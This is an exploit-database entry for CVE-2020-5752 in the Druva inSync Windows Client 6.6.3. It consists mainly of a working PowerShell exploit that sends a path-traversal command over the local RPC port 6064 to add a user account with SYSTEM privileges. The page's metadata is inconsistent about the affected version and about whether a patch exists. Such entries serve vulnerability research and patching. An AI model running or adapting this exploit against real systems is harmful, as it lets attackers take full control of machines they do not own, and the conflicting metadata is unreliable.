header-logo
Suggest Exploit
vendor:
Druva inSync
by:
1F98D
7.8
CVSS
HIGH
Local Privilege Escalation
78
CWE
Product Name: Druva inSync
Affected Version From: 6.6.2003
Affected Version To: 6.6.2003
Patch Exists: NO
Related CWE: CVE-2020-5752
CPE: a:druva:insync:6.6.3
Metasploit:
Other Scripts:
Platforms Tested: Windows
2020

Druva inSync Windows Client 6.6.3 – Local Privilege Escalation (PowerShell)

Druva inSync exposes an RPC service which is vulnerable to a command injection attack.

Mitigation:

Apply the vendor-provided patch or update to the latest version of Druva inSync.
Source

Exploit-DB raw data:

# Exploit Title: Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)
# Date: 2020-12-03
# Exploit Author: 1F98D
# Original Author: Matteo Malvica
# Vendor Homepage: druva.com
# Software Link: https://downloads.druva.com/downloads/inSync/Windows/6.6.3/inSync6.6.3r102156.msi
# Version: 6.6.3
# Tested on: Windows 10 (x64)
# CVE: CVE-2020-5752
# References: https://www.matteomalvica.com/blog/2020/05/21/lpe-path-traversal/
# Druva inSync exposes an RPC service which is vulnerable to a command injection attack.

$ErrorActionPreference = "Stop"

$cmd = "net user pwnd /add"

$s = New-Object System.Net.Sockets.Socket(
    [System.Net.Sockets.AddressFamily]::InterNetwork,
    [System.Net.Sockets.SocketType]::Stream,
    [System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)

$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);

$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)